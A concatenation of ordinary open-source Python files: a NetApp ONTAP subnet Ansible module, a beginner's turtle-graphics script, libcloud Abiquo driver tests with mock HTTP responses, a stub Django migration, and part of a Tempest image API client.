- Create, modify, destroy the network subnet
options:
state:
description:
- Whether the specified network interface group should exist or not.
choices: ['present', 'absent']
default: present
broadcast_domain:
description:
- Specify the required broadcast_domain name for the subnet.
- A broadcast domain can not be modified after the subnet has been created
required: true
name:
description:
- Specify the subnet name.
required: true
from_name:
description:
- Name of the subnet to be renamed
gateway:
description:
- Specify the gateway for the default route of the subnet.
ipspace:
description:
- Specify the ipspace for the subnet.
- The default value for this parameter is the default IPspace, named 'Default'.
ip_ranges:
description:
- Specify the list of IP address ranges associated with the subnet.
subnet:
description:
- Specify the subnet (ip and mask).
required: true
"""
EXAMPLES = """
- name: create subnet
na_ontap_net_subnet:
state: present
username: "{{ netapp_username }}"
password: "{{ netapp_password }}"
hostname: "{{ netapp_hostname }}"
subnet: 10.10.10.0/24
name: subnet-adm
ip_ranges: [ '10.10.10.30-10.10.10.40', '10.10.10.51' ]
gateway: 10.10.10.254
ipspace: Default
broadcast_domain: Default
- name: delete subnet
na_ontap_net_subnet:
state: absent
username: "{{ netapp_username }}"
password: "{{ netapp_password }}"
hostname: "{{ netapp_hostname }}"
name: subnet-adm
ipspace: Default
- name: rename subnet
na_ontap_net_subnet:
state: present
username: "{{ netapp_username }}"
password: "{{ netapp_password }}"
hostname: "{{ netapp_hostname }}"
name: subnet-adm-new
from_name: subnet-adm
ipspace: Default
"""
RETURN = """
"""
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
import ansible.module_utils.netapp as netapp_utils
from ansible.module_utils.netapp_module import NetAppModule
HAS_NETAPP_LIB = netapp_utils.has_netapp_lib()
class NetAppOntapSubnet(object):
"""
Create, Modifies and Destroys a subnet
"""
def __init__(self):
"""
Initialize the ONTAP Subnet class
"""
self.argument_spec = netapp_utils.na_ontap_host_argument_spec()
self.argument_spec.update(dict(
state=dict(required=False, choices=['present', 'absent'], default='present'),
name=dict(required=True, type='str'),
from_name=dict(required=False, type='str'),
broadcast_domain=dict(required=False, type='str'),
gateway=dict(required=False, type='str'),
ip_ranges=dict(required=False, type=list),
ipspace=dict(required=False, type='str'),
subnet=dict(required=False, type='str')
))
self.module = AnsibleModule(
argument_spec=self.argument_spec,
supports_check_mode=True
)
self.na_helper = NetAppModule()
self.parameters = self.na_helper.set_parameters(self.module.params)
if HAS_NETAPP_LIB is False:
self.module.fail_json(msg="the python NetApp-Lib module is required")
else:
self.server = netapp_utils.setup_na_ontap_zapi(module=self.module)
return
def get_subnet(self, name=None):
"""
Return details about the subnet
:param:
name : Name of the subnet
:return: Details about the subnet. None if not found.
:rtype: dict
"""
if name is None:
name = self.parameters.get('name')
subnet_iter = netapp_utils.zapi.NaElement('net-subnet-get-iter')
subnet_info = netapp_utils.zapi.NaElement('net-subnet-info')
subnet_info.add_new_child('subnet-name', name)
query = netapp_utils.zapi.NaElement('query')
query.add_child_elem(subnet_info)
subnet_iter.add_child_elem(query)
result = self.server.invoke_successfully(subnet_iter, True)
return_value = None
# check if query returns the expected subnet
if result.get_child_by_name('num-records') and \
int(result.get_child_content('num-records')) == 1:
subnet_attributes = result.get_child_by_name('attributes-list').get_child_by_name('net-subnet-info')
broadcast_domain = subnet_attributes.get_child_content('broadcast-domain')
gateway = subnet_attributes.get_child_content('gateway')
ipspace = subnet_attributes.get_child_content('ipspace')
subnet = subnet_attributes.get_child_content('subnet')
name = subnet_attributes.get_child_content('subnet-name')
ip_ranges = []
range_obj = subnet_attributes.get_child_by_name('ip-ranges').get_children()
for elem in range_obj:
ip_ranges.append(elem.get_content())
return_value = {
'name': name,
'broadcast_domain': broadcast_domain,
'gateway': gateway,
'ip_ranges': ip_ranges,
'ipspace': ipspace,
'subnet': subnet
}
return return_value
def create_subnet(self):
"""
Creates a new subnet
"""
options = {'subnet-name': self.parameters.get('name'),
'broadcast-domain': self.parameters.get('broadcast_domain'),
'subnet': self.parameters.get('subnet')}
subnet_create = netapp_utils.zapi.NaElement.create_node_with_children(
'net-subnet-create', **options)
if self.parameters.get('gateway'):
subnet_create.add_new_child('gateway', self.parameters.get('gateway'))
if self.parameters.get('ip_ranges'):
subnet_ips = netapp_utils.zapi.NaElement('ip-ranges')
subnet_create.add_child_elem(subnet_ips)
for ip_range in self.parameters.get('ip_ranges'):
subnet_ips.add_new_child('ip-range', ip_range)
if self.parameters.get('ipspace'):
subnet_create.add_new_child('ipspace', self.parameters.get('ipspace'))
try:
self.server.invoke_successfully(subnet_create, True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error creating subnet %s: %s' % (self.parameters.get('name'), to_native(error)),
exception=traceback.format_exc())
def delete_subnet(self):
"""
Deletes a subnet
"""
subnet_delete = netapp_utils.zapi.NaElement.create_node_with_children(
'net-subnet-destroy', **{'subnet-name': self.parameters.get('name')})
try:
self.server.invoke_successfully(subnet_delete, True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error deleting subnet %s: %s' % (self.parameters.get('name'), to_native(error)),
exception=traceback.format_exc())
def modify_subnet(self):
"""
Modifies a subnet
"""
options = {'subnet-name': self.parameters.get('name')}
subnet_modify = netapp_utils.zapi.NaElement.create_node_with_children(
'net-subnet-modify', **options)
if self.parameters.get('gateway'):
subnet_modify.add_new_child('gateway', self.parameters.get('gateway'))
if self.parameters.get('ip_ranges'):
subnet_ips = netapp_utils.zapi.NaElement('ip-ranges')
subnet_modify.add_child_elem(subnet_ips)
for ip_range in self.parameters.get('ip_ranges'):
subnet_ips.add_new_child('ip-range', ip_range)
if self.parameters.get('ipspace'):
subnet_modify.add_new_child('ipspace', self.parameters.get('ipspace'))
if self.parameters.get('subnet'):
subnet_modify.add_new_child('subnet', self.parameters.get('subnet'))
try:
self.server.invoke_successfully(subnet_modify, True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error modifying subnet %s: %s' % (self.parameters.get('name'), to_native(error)),
exception=traceback.format_exc())
def rename_subnet(self):
"""
TODO
"""
options = {'subnet-name': self.parameters.get('from_name'),
'new-name': self.parameters.get('name')}
subnet_rename = netapp_utils.zapi.NaElement.create_node_with_children(
'net-subnet-rename', **options)
if self.parameters.get('ipspace'):
subnet_rename.add_new_child('ipspace', self.parameters.get('ipspace'))
try:
self.server.invoke_successfully(subnet_rename, True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error renaming subnet %s: %s' % (self.parameters.get('name'), to_native(error)),
exception=traceback.format_exc())
def apply(self):
'''Apply action to subnet'''
results = netapp_utils.get_cserver(self.server)
cserver = netapp_utils.setup_na_ontap_zapi(module=self.module, vserver=results)
netapp_utils.ems_log_event("na_ontap_net_subnet", cserver)
current = self.get_subnet()
cd_action, rename = None, None
if self.parameters.get('from_name'):
rename = self.na_helper.is_rename_action(self.get_subnet(self.parameters.get('from_name')), current)
if rename is False:
self.module.fail_json(msg="Error renaming: subnet %s does not exist" %
self.parameters.get('from_name'))
else:
cd_action = self.na_helper.get_cd_action(current, self.parameters)
modify = self.na_helper.get_modified_attributes(current, self.parameters)
for attribute in modify:
if attribute in ['broadcast_domain']:
self.module.fail_json(msg='Error modifying subnet %s: cannot modify broadcast_domain parameter.' % self.parameters.get('name'))
if self.na_helper.changed:
if self.module.check_mode:
pass
else:
if rename:
self.rename_subnet()
# If rename is True, cd_action is NOne but modify could be true
if cd_action == 'create':
for attribute in ['subnet', 'broadcast_domain']:
if not self.parameters.get(attribute):
self.module.fail_json(msg='Error - missing required arguments: %s.' % attribute)
self.create_subnet()
elif cd_action == 'delete':
self.delete_subnet()
elif modify:
self.modify_subnet()
self.module.exit_json(changed=self.na_helper.changed)
def main():
"""
Creates the NetApp ONTAP Net Route object and runs the correct play task
"""
subnet_obj = NetAppOntapSubnet()
subnet_obj.apply()
if __name__ == '__main__':
main()
|
povellesto/blobygames | refs/heads/master | Blob Rage App/random/makehacks.py | 1 | import random
import turtle
moveforward = ("Move forward")
turnleft = ("Turn Left")
movebackward = ("Move Backward")
turnright = ("Turn Right")
square = ("square")
circle = ("circle")
penUp = ("pen up")
penDown = ("pen down")
goto = ("go to")
house = ("house")
Instructions = ("Intructions")
def Instuctions():
print("")
print("Welcome To My Make Hacks Project!")
print("To make your turtle move forward, type moveforward")
print("To make your turtle move backward, type movebackward")
print("To make your turtle move left, type turnleft")
print("To make your turtle move right, type turnright")
print("")
def window():
turtle.right(35)
turtle.forward(10)
turtle.left(90)
turtle.forward(10)
turtle.left(90)
turtle.forward(10)
turtle.left(90)
turtle.forward(10)
Instuctions()
for i in range(1000):
Input = input("Enter a command ")
if Input == moveforward:
ask2 = input("How many Pixels? ")
turtle.forward(ask2)
if Input == turnleft:
ask3 = input("How many Pixels? ")
turtle.left(ask3)
if Input == movebackward:
turtle.left(180)
ask4 = input("How many pixels would you like to go backward ")
turtle.forward(ask4)
if Input == Instructions:
Instructions()
if Input == square:
size= input("How big do you want the square to be? ")
turtle.forward(size)
turtle.left(90)
turtle.forward(size)
turtle.left(90)
turtle.forward(size)
turtle.left(90)
turtle.forward(size)
if Input == circle:
ask5 = input("How big do you want the diameter to be? ")
turtle.circle(ask5)
if Input == penUp:
turtle.penup()
if Input == penDown:
turtle.pendown()
if Input == goto:
ask6 = input("x coordinates? ")
ask7 = input("y coordinates? ")
turtle.goto(ask6,ask7)
if Input == house:
size= input("How big do you want the square to be? ")
turtle.forward(size)
turtle.left(90)
turtle.forward(size)
turtle.left(90)
turtle.forward(size)
turtle.left(90)
turtle.forward(size)
turtle.left(180)
turtle.forward(size)
turtle.right(45)
turtle.forward(size-20)
turtle.right(101)
turtle.forward(size-18)
turtle.penup()
turtle.goto((size/2)/2,size/2)
turtle.pendown()
window()
|
Hybrid-Cloud/badam | refs/heads/master | patches_tool/aws_patch/aws_deps/libcloud/test/compute/test_abiquo.py | 1 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Abiquo Test Suite
"""
import unittest
import sys
try:
from lxml import etree as ET
except ImportError:
from xml.etree import ElementTree as ET
from libcloud.utils.py3 import httplib
from libcloud.compute.drivers.abiquo import AbiquoNodeDriver
from libcloud.common.abiquo import ForbiddenError, get_href
from libcloud.common.types import InvalidCredsError, LibcloudError
from libcloud.compute.base import NodeLocation, NodeImage
from libcloud.test.compute import TestCaseMixin
from libcloud.test import MockHttpTestCase
from libcloud.test.file_fixtures import ComputeFileFixtures
class AbiquoNodeDriverTest(unittest.TestCase, TestCaseMixin):
"""
Abiquo Node Driver test suite
"""
def setUp(self):
"""
Set up the driver with the main user
"""
AbiquoNodeDriver.connectionCls.conn_classes = (AbiquoMockHttp, None)
self.driver = AbiquoNodeDriver('son', 'goku',
'http://dummy.host.com/api')
def test_unauthorized_controlled(self):
"""
Test the Unauthorized Exception is Controlled.
Test, through the 'login' method, that a '401 Unauthorized'
raises a 'InvalidCredsError' instead of the 'MalformedUrlException'
"""
self.assertRaises(InvalidCredsError, AbiquoNodeDriver, 'son',
'goten', 'http://dummy.host.com/api')
def test_forbidden_controlled(self):
"""
Test the Forbidden Exception is Controlled.
Test, through the 'list_images' method, that a '403 Forbidden'
raises an 'ForbidenError' instead of the 'MalformedUrlException'
"""
AbiquoNodeDriver.connectionCls.conn_classes = (AbiquoMockHttp, None)
conn = AbiquoNodeDriver('son', 'gohan', 'http://dummy.host.com/api')
self.assertRaises(ForbiddenError, conn.list_images)
def test_handle_other_errors_such_as_not_found(self):
"""
Test common 'logical' exceptions are controlled.
Test that common exception (normally 404-Not Found and 409-Conflict),
that return an XMLResponse with the explanation of the errors are
controlled.
"""
self.driver = AbiquoNodeDriver('go', 'trunks',
'http://dummy.host.com/api')
self.assertRaises(LibcloudError, self.driver.list_images)
def test_ex_create_and_delete_empty_group(self):
"""
Test the creation and deletion of an empty group.
"""
group = self.driver.ex_create_group('libcloud_test_group')
group.destroy()
def test_create_node_no_image_raise_exception(self):
"""
Test 'create_node' without image.
Test the 'create_node' function without 'image' parameter raises
an Exception
"""
self.assertRaises(LibcloudError, self.driver.create_node)
def test_list_locations_response(self):
if not self.should_list_locations:
return None
locations = self.driver.list_locations()
self.assertTrue(isinstance(locations, list))
def test_create_node_specify_location(self):
"""
Test you can create a node specifying the location.
"""
image = self.driver.list_images()[0]
location = self.driver.list_locations()[0]
self.driver.create_node(image=image, location=location)
def test_create_node_specify_wrong_location(self):
"""
Test you can not create a node with wrong location.
"""
image = self.driver.list_images()[0]
location = NodeLocation(435, 'fake-location', 'Spain', self.driver)
self.assertRaises(LibcloudError, self.driver.create_node, image=image,
location=location)
def test_create_node_specify_wrong_image(self):
"""
Test image compatibility.
Some locations only can handle a group of images, not all of them.
Test you can not create a node with incompatible image-location.
"""
# Create fake NodeImage
image = NodeImage(3234, 'dummy-image', self.driver)
location = self.driver.list_locations()[0]
# With this image, it should raise an Exception
self.assertRaises(LibcloudError, self.driver.create_node, image=image,
location=location)
def test_create_node_specify_group_name(self):
"""
Test 'create_node' into a concrete group.
"""
image = self.driver.list_images()[0]
self.driver.create_node(image=image, group_name='new_group_name')
def test_create_group_location_does_not_exist(self):
"""
Test 'create_node' with an unexistent location.
Defines a 'fake' location and tries to create a node into it.
"""
location = NodeLocation(435, 'fake-location', 'Spain', self.driver)
# With this location, it should raise an Exception
self.assertRaises(LibcloudError, self.driver.ex_create_group,
name='new_group_name',
location=location)
def test_destroy_node_response(self):
"""
'destroy_node' basic test.
Override the destroy to return a different node available
to be undeployed. (by default it returns an already undeployed node,
for test creation).
"""
self.driver = AbiquoNodeDriver('go', 'trunks',
'http://dummy.host.com/api')
node = self.driver.list_nodes()[0]
ret = self.driver.destroy_node(node)
self.assertTrue(ret)
def test_destroy_node_response_failed(self):
"""
'destroy_node' asynchronous error.
Test that the driver handles correctly when, for some reason,
the 'destroy' job fails.
"""
self.driver = AbiquoNodeDriver('muten', 'roshi',
'http://dummy.host.com/api')
node = self.driver.list_nodes()[0]
ret = self.driver.destroy_node(node)
self.assertFalse(ret)
def test_destroy_node_allocation_state(self):
"""
Test the 'destroy_node' invalid state.
Try to destroy a node when the node is not running.
"""
self.driver = AbiquoNodeDriver('ve', 'geta',
'http://dummy.host.com/api')
# Override the destroy to return a different node available to be
# undeployed
node = self.driver.list_nodes()[0]
# The mock class with the user:password 've:geta' returns a node that
# is in 'ALLOCATION' state and hence, the 'destroy_node' method should
# raise a LibcloudError
self.assertRaises(LibcloudError, self.driver.destroy_node, node)
def test_destroy_not_deployed_group(self):
"""
Test 'ex_destroy_group' when group is not deployed.
"""
location = self.driver.list_locations()[0]
group = self.driver.ex_list_groups(location)[1]
self.assertTrue(group.destroy())
def test_destroy_deployed_group(self):
"""
Test 'ex_destroy_group' when there are machines running.
"""
location = self.driver.list_locations()[0]
group = self.driver.ex_list_groups(location)[0]
self.assertTrue(group.destroy())
def test_destroy_deployed_group_failed(self):
"""
Test 'ex_destroy_group' fails.
Test driver handles correctly when, for some reason, the
asynchronous job fails.
"""
self.driver = AbiquoNodeDriver('muten', 'roshi',
'http://dummy.host.com/api')
location = self.driver.list_locations()[0]
group = self.driver.ex_list_groups(location)[0]
self.assertFalse(group.destroy())
def test_destroy_group_invalid_state(self):
"""
Test 'ex_destroy_group' invalid state.
Test the Driver raises an exception when the group is in
invalid temporal state.
"""
self.driver = AbiquoNodeDriver('ve', 'geta',
'http://dummy.host.com/api')
location = self.driver.list_locations()[0]
group = self.driver.ex_list_groups(location)[1]
self.assertRaises(LibcloudError, group.destroy)
def test_run_node(self):
"""
Test 'ex_run_node' feature.
"""
node = self.driver.list_nodes()[0]
# Node is by default in NodeState.TERMINATED and AbiquoState ==
# 'NOT_ALLOCATED'
# so it is available to be runned
self.driver.ex_run_node(node)
def test_run_node_invalid_state(self):
"""
Test 'ex_run_node' invalid state.
Test the Driver raises an exception when try to run a
node that is in invalid state to run.
"""
self.driver = AbiquoNodeDriver('go', 'trunks',
'http://dummy.host.com/api')
node = self.driver.list_nodes()[0]
# Node is by default in AbiquoState = 'ON' for user 'go:trunks'
# so is not available to be runned
self.assertRaises(LibcloudError, self.driver.ex_run_node, node)
def test_run_node_failed(self):
"""
Test 'ex_run_node' fails.
Test driver handles correctly when, for some reason, the
asynchronous job fails.
"""
self.driver = AbiquoNodeDriver('ten', 'shin',
'http://dummy.host.com/api')
node = self.driver.list_nodes()[0]
# Node is in the correct state, but it fails because of the
# async task and it raises the error.
self.assertRaises(LibcloudError, self.driver.ex_run_node, node)
def test_get_href(self):
xml = '''
<datacenter>
<link href="http://10.60.12.7:80/api/admin/datacenters/2"
type="application/vnd.abiquo.datacenter+xml" rel="edit1"/>
<link href="http://10.60.12.7:80/ponies/bar/foo/api/admin/datacenters/3"
type="application/vnd.abiquo.datacenter+xml" rel="edit2"/>
<link href="http://vdcbridge.interoute.com:80/jclouds/apiouds/api/admin/enterprises/1234"
type="application/vnd.abiquo.datacenter+xml" rel="edit3"/>
</datacenter>
'''
elem = ET.XML(xml)
href = get_href(element=elem, rel='edit1')
self.assertEqual(href, '/admin/datacenters/2')
href = get_href(element=elem, rel='edit2')
self.assertEqual(href, '/admin/datacenters/3')
href = get_href(element=elem, rel='edit3')
self.assertEqual(href, '/admin/enterprises/1234')
class AbiquoMockHttp(MockHttpTestCase):
"""
Mock the functionallity of the remote Abiquo API.
"""
fixtures = ComputeFileFixtures('abiquo')
fixture_tag = 'default'
def _api_login(self, method, url, body, headers):
if headers['Authorization'] == 'Basic c29uOmdvdGVu':
expected_response = self.fixtures.load('unauthorized_user.html')
expected_status = httplib.UNAUTHORIZED
else:
expected_response = self.fixtures.load('login.xml')
expected_status = httplib.OK
return (expected_status, expected_response, {}, '')
def _api_cloud_virtualdatacenters(self, method, url, body, headers):
return (httplib.OK, self.fixtures.load('vdcs.xml'), {}, '')
def _api_cloud_virtualdatacenters_4(self, method, url, body, headers):
return (httplib.OK, self.fixtures.load('vdc_4.xml'), {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances(self, method, url, body, headers):
if method == 'POST':
vapp_name = ET.XML(body).findtext('name')
if vapp_name == 'libcloud_test_group':
# we come from 'test_ex_create_and_delete_empty_group(self):'
# method and so, we return the 'ok' return
response = self.fixtures.load('vdc_4_vapp_creation_ok.xml')
return (httplib.OK, response, {}, '')
elif vapp_name == 'new_group_name':
# we come from 'test_ex_create_and_delete_empty_group(self):'
# method and so, we return the 'ok' return
response = self.fixtures.load('vdc_4_vapp_creation_ok.xml')
return (httplib.OK, response, {}, '')
else:
# It will be a 'GET';
return (httplib.OK, self.fixtures.load('vdc_4_vapps.xml'), {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_5(self, method, url, body, headers):
if method == 'GET':
if headers['Authorization'] == 'Basic dmU6Z2V0YQ==':
# Try to destroy a group with 'needs_sync' state
response = self.fixtures.load('vdc_4_vapp_5_needs_sync.xml')
else:
# Try to destroy a group with 'undeployed' state
response = self.fixtures.load('vdc_4_vapp_5.xml')
return (httplib.OK, response, {}, '')
else:
# it will be a 'DELETE'
return (httplib.NO_CONTENT, '', {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6(self, method, url, body, headers):
if method == 'GET':
# deployed vapp
response = self.fixtures.load('vdc_4_vapp_6.xml')
return (httplib.OK, response, {}, '')
else:
# it will be a 'DELETE'
return (httplib.NO_CONTENT, '', {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_tasks_1da8c8b6_86f6_49ef_9d29_57dcc73b875a(self, method, url, body, headers):
if headers['Authorization'] == 'Basic bXV0ZW46cm9zaGk=':
# User 'muten:roshi' failed task
response = self.fixtures.load(
'vdc_4_vapp_6_undeploy_task_failed.xml')
else:
response = self.fixtures.load('vdc_4_vapp_6_undeploy_task.xml')
return (httplib.OK, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_5_virtualmachines(
self, method, url, body, headers):
# This virtual app never have virtual machines
if method == 'GET':
response = self.fixtures.load('vdc_4_vapp_5_vms.xml')
return (httplib.OK, response, {}, '')
elif method == 'POST':
# it must be a POST
response = self.fixtures.load('vdc_4_vapp_6_vm_creation_ok.xml')
return (httplib.CREATED, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines(
self, method, url, body, headers):
# Default-created virtual app virtual machines'
if method == 'GET':
if headers['Authorization'] == 'Basic dmU6Z2V0YQ==':
response = self.fixtures.load('vdc_4_vapp_6_vms_allocated.xml')
else:
response = self.fixtures.load('vdc_4_vapp_6_vms.xml')
return (httplib.OK, response, {}, '')
else:
# it must be a POST
response = self.fixtures.load('vdc_4_vapp_6_vm_creation_ok.xml')
return (httplib.CREATED, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3(self, method, url, body, headers):
if (headers['Authorization'] == 'Basic Z286dHJ1bmtz' or
headers['Authorization'] == 'Basic bXV0ZW46cm9zaGk='):
# Undeploy node
response = self.fixtures.load("vdc_4_vapp_6_vm_3_deployed.xml")
elif headers['Authorization'] == 'Basic dmU6Z2V0YQ==':
# Try to undeploy a node with 'allocation' state
response = self.fixtures.load('vdc_4_vapp_6_vm_3_allocated.xml')
else:
# Get node
response = self.fixtures.load('vdc_4_vapp_6_vm_3.xml')
return (httplib.OK, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_action_deploy(self, method, url,
body, headers):
response = self.fixtures.load('vdc_4_vapp_6_vm_3_deploy.xml')
return (httplib.CREATED, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_tasks_b44fe278_6b0f_4dfb_be81_7c03006a93cb(self, method, url, body, headers):
if headers['Authorization'] == 'Basic dGVuOnNoaW4=':
# User 'ten:shin' failed task
response = self.fixtures.load(
'vdc_4_vapp_6_vm_3_deploy_task_failed.xml')
else:
response = self.fixtures.load('vdc_4_vapp_6_vm_3_deploy_task.xml')
return (httplib.OK, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_action_undeploy(
self, method, url, body, headers):
response = self.fixtures.load('vdc_4_vapp_6_undeploy.xml')
return (httplib.OK, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_action_reset(self, method,
url, body, headers):
response = self.fixtures.load('vdc_4_vapp_6_vm_3_reset.xml')
return (httplib.CREATED, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_tasks_a8c9818e_f389_45b7_be2c_3db3a9689940(self, method, url, body, headers):
if headers['Authorization'] == 'Basic bXV0ZW46cm9zaGk=':
# User 'muten:roshi' failed task
response = self.fixtures.load(
'vdc_4_vapp_6_undeploy_task_failed.xml')
else:
response = self.fixtures.load('vdc_4_vapp_6_vm_3_reset_task.xml')
return (httplib.OK, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_action_undeploy(self, method, url,
body, headers):
response = self.fixtures.load('vdc_4_vapp_6_vm_3_undeploy.xml')
return (httplib.CREATED, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_network_nics(self, method, url,
body, headers):
response = self.fixtures.load('vdc_4_vapp_6_vm_3_nics.xml')
return (httplib.OK, response, {}, '')
def _api_admin_datacenters(self, method, url, body, headers):
return (httplib.OK, self.fixtures.load('dcs.xml'), {}, '')
def _api_admin_enterprises_1(self, method, url, body, headers):
return (httplib.OK, self.fixtures.load('ent_1.xml'), {}, '')
def _api_admin_enterprises_1_datacenterrepositories(self, method, url, body, headers):
# When the user is the common one for all the tests ('son, 'goku')
# it creates this basic auth and we return the datacenters value
if headers['Authorization'] == 'Basic Z286dHJ1bmtz':
expected_response = self.fixtures.load("not_found_error.xml")
return (httplib.NOT_FOUND, expected_response, {}, '')
elif headers['Authorization'] != 'Basic c29uOmdvaGFu':
return (httplib.OK, self.fixtures.load('ent_1_dcreps.xml'), {}, '')
else:
# son:gohan user: forbidden error
expected_response = self.fixtures.load("privilege_errors.html")
return (httplib.FORBIDDEN, expected_response, {}, '')
def _api_admin_enterprises_1_datacenterrepositories_2(self, method, url, body, headers):
return (httplib.OK, self.fixtures.load('ent_1_dcrep_2.xml'), {}, '')
def _api_admin_enterprises_1_datacenterrepositories_2_virtualmachinetemplates(self, method, url, body, headers):
return (httplib.OK, self.fixtures.load('ent_1_dcrep_2_templates.xml'),
{}, '')
def _api_admin_enterprises_1_datacenterrepositories_2_virtualmachinetemplates_11(self, method, url, body, headers):
return (
httplib.OK, self.fixtures.load('ent_1_dcrep_2_template_11.xml'),
{}, '')
if __name__ == '__main__':
sys.exit(unittest.main())
|
skirsdeda/django | refs/heads/master | tests/migrations/test_migrations_squashed_complex_multi_apps/app1/3_auto.py | 22 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [("app1", "2_auto"), ("app2", "2_auto")]
operations = [
migrations.RunPython(lambda apps, schema_editor: None)
]
|
afaheem88/tempest | refs/heads/master | tempest/services/image/v1/json/image_client.py | 6 | # Copyright 2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import errno
import json
import os
import time
from oslo_log import log as logging
import six
from six.moves.urllib import parse as urllib
from tempest_lib.common.utils import misc as misc_utils
from tempest_lib import exceptions as lib_exc
from tempest.common import glance_http
from tempest.common import service_client
from tempest import exceptions
LOG = logging.getLogger(__name__)
class ImageClient(service_client.ServiceClient):
def __init__(self, auth_provider, catalog_type, region, endpoint_type=None,
build_interval=None, build_timeout=None,
disable_ssl_certificate_validation=None,
ca_certs=None, trace_requests=None):
super(ImageClient, self).__init__(
auth_provider,
catalog_type,
region,
endpoint_type=endpoint_type,
build_interval=build_interval,
build_timeout=build_timeout,
disable_ssl_certificate_validation=(
disable_ssl_certificate_validation),
ca_certs=ca_certs,
trace_requests=trace_requests)
self._http = None
self.dscv = disable_ssl_certificate_validation
self.ca_certs = ca_certs
def _image_meta_from_headers(self, headers):
meta = {'properties': {}}
for key, value in six.iteritems(headers):
if key.startswith('x-image-meta-property-'):
_key = key[22:]
meta['properties'][_key] = value
elif key.startswith('x-image-meta-'):
_key = key[13:]
meta[_key] = value
for key in ['is_public', 'protected', 'deleted']:
if key in meta:
meta[key] = meta[key].strip().lower() in ('t', 'true', 'yes',
'1')
for key in ['size', 'min_ram', 'min_disk']:
if key in meta:
try:
meta[key] = int(meta[key])
except ValueError:
pass
return meta
def _image_meta_to_headers(self, fields):
headers = {}
fields_copy = copy.deepcopy(fields)
copy_from = fields_copy.pop('copy_from', None)
if copy_from is not None:
headers['x-glance-api-copy-from'] = copy_from
for key, value in six.iteritems(fields_copy.pop('properties', {})):
headers['x-image-meta-property-%s' % key] = str(value)
for key, value in six.iteritems(fields_copy.pop('api', {})):
headers['x-glance-api-property-%s' % key] = str(value)
for key, value in six.iteritems(fields_copy):
headers['x-image-meta-%s' % key] = str(value)
return headers
def _get_file_size(self, obj):
"""Analyze file-like object and attempt to determine its size.
:param obj: file-like object, typically redirected from stdin.
:retval The file's size or None if it cannot be determined.
"""
# For large images, we need to supply the size of the
# image file. See LP Bugs #827660 and #845788.
if hasattr(obj, 'seek') and hasattr(obj, 'tell'):
try:
obj.seek(0, os.SEEK_END)
obj_size = obj.tell()
obj.seek(0)
return obj_size
except IOError as e:
if e.errno == errno.ESPIPE:
# Illegal seek. This means the user is trying
# to pipe image data to the client, e.g.
# echo testdata | bin/glance add blah..., or
# that stdin is empty, or that a file-like
# object which doesn't support 'seek/tell' has
# been supplied.
return None
else:
raise
else:
# Cannot determine size of input image
return None
def _get_http(self):
return glance_http.HTTPClient(auth_provider=self.auth_provider,
filters=self.filters,
insecure=self.dscv,
ca_certs=self.ca_certs)
def _create_with_data(self, headers, data):
resp, body_iter = self.http.raw_request('POST', '/v1/images',
headers=headers, body=data)
self._error_checker('POST', '/v1/images', headers, data, resp,
body_iter)
body = json.loads(''.join([c for c in body_iter]))
return service_client.ResponseBody(resp, body['image'])
def _update_with_data(self, image_id, headers, data):
url = '/v1/images/%s' % image_id
resp, body_iter = self.http.raw_request('PUT', url, headers=headers,
body=data)
self._error_checker('PUT', url, headers, data,
resp, body_iter)
body = json.loads(''.join([c for c in body_iter]))
return service_client.ResponseBody(resp, body['image'])
@property
def http(self):
if self._http is None:
self._http = self._get_http()
return self._http
def create_image(self, name, container_format, disk_format, **kwargs):
params = {
"name": name,
"container_format": container_format,
"disk_format": disk_format,
}
headers = {}
for option in ['is_public', 'location', 'properties',
'copy_from', 'min_ram']:
if option in kwargs:
params[option] = kwargs.get(option)
headers.update(self._image_meta_to_headers(params))
if 'data' in kwargs:
return self._create_with_data(headers, kwargs.get('data'))
resp, body = self.post('v1/images', None, headers)
self.expected_success(201, resp.status)
body = json.loads(body)
return service_client.ResponseBody(resp, body['image'])
def update_image(self, image_id, name=None, container_format=None,
data=None, properties=None):
params = {}
headers = {}
if name is not None:
params['name'] = name
if container_format is not None:
params['container_format'] = container_format
if properties is not None:
params['properties'] = properties
